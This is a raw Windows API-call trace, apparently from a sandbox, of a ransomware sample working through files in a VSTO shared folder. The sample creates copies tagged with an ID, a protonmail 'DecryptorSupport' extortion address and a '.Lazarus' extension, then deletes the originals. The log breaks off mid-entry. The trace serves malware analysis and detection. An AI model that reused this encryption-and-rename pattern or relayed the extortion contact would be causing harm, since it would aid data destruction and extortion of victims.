[0104.306] WriteFile (in: hFile=0x368, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0104.430] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x944a8 | out: hHeap=0x20000) returned 1 [0104.430] CloseHandle (hObject=0x368) returned 1 [0104.431] AreFileApisANSI () returned 1 [0104.431] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81 [0104.431] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa2) returned 0x5f2c8 [0104.431] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x5f2c8, cchWideChar=81 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll") returned 81 [0104.431] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstomessageprovider.dll")) returned 1 [0104.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0104.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0104.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0104.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0104.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0104.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0104.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0104.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0104.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0104.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d540 | out: hHeap=0x20000) returned 1 [0104.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x986d0 | out: hHeap=0x20000) returned 1 [0104.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c288 | out: hHeap=0x20000) returned 1 [0104.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0104.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0104.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0104.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0104.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0104.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0104.433] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.433] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.433] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x1, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x583, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x28bf8, dwReserved0=0x1, dwReserved1=0x0, cFileName="ˠ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧賂̧⺊Ā̧붼聐̧㑍Ā̧肐\x07̧비聐蝈\x08賂̧")) returned 0 [0104.433] FindClose (in: hFindFile=0x78090 | out: hFindFile=0x78090) returned 1 [0104.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0104.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0104.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0104.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0104.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0104.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0104.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e580 | out: hHeap=0x20000) returned 1 [0104.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0104.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0104.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x462e8 | out: hHeap=0x20000) returned 1 [0104.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0104.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0104.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0104.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0104.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0104.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0104.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0104.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0104.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0104.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0104.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0104.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fd18 [0104.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0104.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0104.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0104.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fd18 | out: hHeap=0x20000) returned 1 [0104.434] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.434] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.434] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.434] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0104.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0104.434] AreFileApisANSI () returned 1 [0104.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll", lpUsedDefaultChar=0x0) returned 63 [0104.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0104.434] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.434] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0104.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0104.434] AreFileApisANSI () returned 1 [0104.434] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0104.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7e) returned 0x6e3e8 [0104.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x6e3e8, cchWideChar=63 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll") returned 63 [0104.435] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x35c [0104.435] GetFileType (hFile=0x35c) returned 0x1 [0104.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0104.435] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0104.435] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0104.435] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0104.435] CloseHandle (hObject=0x35c) returned 1 [0104.436] AreFileApisANSI () returned 1 [0104.436] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0104.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7e) returned 0x6e580 [0104.436] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x6e580, cchWideChar=63 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll") returned 63 [0104.436] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x35c [0104.436] GetFileType (hFile=0x35c) returned 0x1 [0104.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e580 | out: hHeap=0x20000) returned 1 [0104.436] CloseHandle (hObject=0x35c) returned 1 [0104.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0104.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0104.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0104.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0104.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0104.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0104.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0104.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0104.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0104.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0104.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0104.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0104.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0104.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0104.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0104.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0104.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0104.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0104.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0104.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0104.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0104.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0104.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0104.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0104.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0104.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0104.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0104.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0104.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0104.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0104.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0104.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0104.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0104.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0104.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0104.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0104.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0104.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0104.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0104.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0104.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0104.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0104.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0104.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0104.437] AreFileApisANSI () returned 1 [0104.437] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0104.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7e) returned 0x6ecf0 [0104.438] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x6ecf0, cchWideChar=63 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll") returned 63 [0104.438] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x29080)) returned 1 [0104.438] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ecf0 | out: hHeap=0x20000) returned 1 [0104.438] AreFileApisANSI () returned 1 [0104.438] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0104.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0104.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0104.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0104.438] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0104.438] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0104.438] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0104.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0104.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0104.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0104.438] GetLastError () returned 0x0 [0104.438] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x35c [0104.449] GetFileType (hFile=0x35c) returned 0x1 [0104.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30fc0 | out: hHeap=0x20000) returned 1 [0104.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0104.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0104.449] AreFileApisANSI () returned 1 [0104.449] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0104.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7e) returned 0x6ea48 [0104.449] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6ea48, cchWideChar=63 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll") returned 63 [0104.449] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0104.449] GetFileType (hFile=0x368) returned 0x1 [0104.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0104.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69db0 [0104.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0104.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0104.450] GetLastError () returned 0x0 [0104.461] CloseHandle (hObject=0x35c) returned 1 [0104.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x986d0 | out: hHeap=0x20000) returned 1 [0104.462] CloseHandle (hObject=0x368) returned 1 [0104.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0104.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0104.462] AreFileApisANSI () returned 1 [0104.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0104.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7e) returned 0x6e828 [0104.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6e828, cchWideChar=63 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll") returned 63 [0104.462] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0104.480] GetFileType (hFile=0x368) returned 0x1 [0104.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e828 | out: hHeap=0x20000) returned 1 [0104.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x986d0 [0104.480] GetLastError () returned 0xb7 [0104.481] CloseHandle (hObject=0x368) returned 1 [0104.481] AreFileApisANSI () returned 1 [0104.481] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0104.481] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7e) returned 0x6e030 [0104.481] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6e030, cchWideChar=63 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll") returned 63 [0104.482] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee.dll")) returned 1 [0104.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0104.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0104.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0104.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0104.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0104.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0104.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0104.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0104.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d648 | out: hHeap=0x20000) returned 1 [0104.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d540 | out: hHeap=0x20000) returned 1 [0104.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x934a0 | out: hHeap=0x20000) returned 1 [0104.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bd10 | out: hHeap=0x20000) returned 1 [0104.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0104.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0104.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0104.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0104.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0104.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0104.483] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.483] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.483] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6340300, ftCreationTime.dwHighDateTime=0x1d0d6b2, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0xd6340300, ftLastWriteTime.dwHighDateTime=0x1d0d6b2, nFileSizeHigh=0x0, nFileSizeLow=0x4298, dwReserved0=0x1, dwReserved1=0x0, cFileName="vstoee100.tlb", cAlternateFileName="VSTOEE~1.TLB")) returned 1 [0104.483] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0104.483] RtlAllocateHeap 